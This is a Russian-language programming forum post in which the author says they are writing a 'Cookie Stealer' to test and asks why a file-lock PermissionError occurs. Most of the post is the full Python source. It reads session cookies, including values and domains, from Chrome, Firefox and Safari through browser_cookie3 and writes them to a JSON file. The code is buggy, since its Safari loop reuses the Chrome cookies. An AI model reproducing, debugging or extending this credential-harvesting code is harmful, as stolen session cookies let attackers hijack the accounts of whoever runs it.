# PermissionError: [WinError 32] Процесс не может получить доступ к файлу, так как этот файл занят другим процессом

Tags: python

## Что и как

Я пытался создать Cookie Stealer что бы просто потестить. И я получаю ошибку при запуске исходника.
Заранее хочу сказать: запускал от имени админа в консоли, файлы создаются даже через ошибку, но в самом cookie.json текст такого содержания - {"chrome": [], "firefox": [], "safari": []}, искал ответы, именно на свой вопрос не нашел. Сама ошибка:

PermissionError: [WinError 32] Процесс не может получить доступ к файлу, так как этот файл занят другим процессом: 'C:\Users\E8E5~1\AppData\Local\Temp\tmpdc2k43l4.sqlite'
None

Теперь к коду:

```
import os
import json
import browser_cookie3

os.mkdir('C:/Program Files/CsDump')

try:
    chrome = browser_cookie3.chrome()
except:
    chrome = None

try:
    firefox = browser_cookie3.firefox()
except:
    firefox = None

try:
    safari = browser_cookie3.safari()
except:
    safari = None

cookie_list = {
    "chrome": [],
    "firefox": [],
    "safari": []
}

print(chrome)
if(chrome!=None) and (len(chrome)!=0):
    for cookie in chrome:
            cookie_list["chrome"].append({
                "Name": cookie.name,
                "Value": cookie.value,
                "Domain": cookie.domain,
                "Secure": str(cookie.secure),
                "ExpireTime": str(cookie.expires)
            })

if(firefox!=None) and (len(firefox)!=0):
    for cookie in firefox:
            cookie_list["firefox"].append({
                "Name": cookie.name,
                "Value": cookie.value,
                "Domain": cookie.domain,
                "Secure": str(cookie.secure),
                "ExpireTime": str(cookie.expires)
            })

if(safari!=None) and (len(safari)!=0):
    for cookie in chrome:
            cookie_list["safari"].append({
                "Name": cookie.name,
                "Value": cookie.value,
                "Domain": cookie.domain,
                "Secure": str(cookie.secure),
                "ExpireTime": str(cookie.expires)
            })

with open('C:/Program Files/CsDump/cookies.json', 'w') as f:
    f.write(json.dumps(cookie_list))
```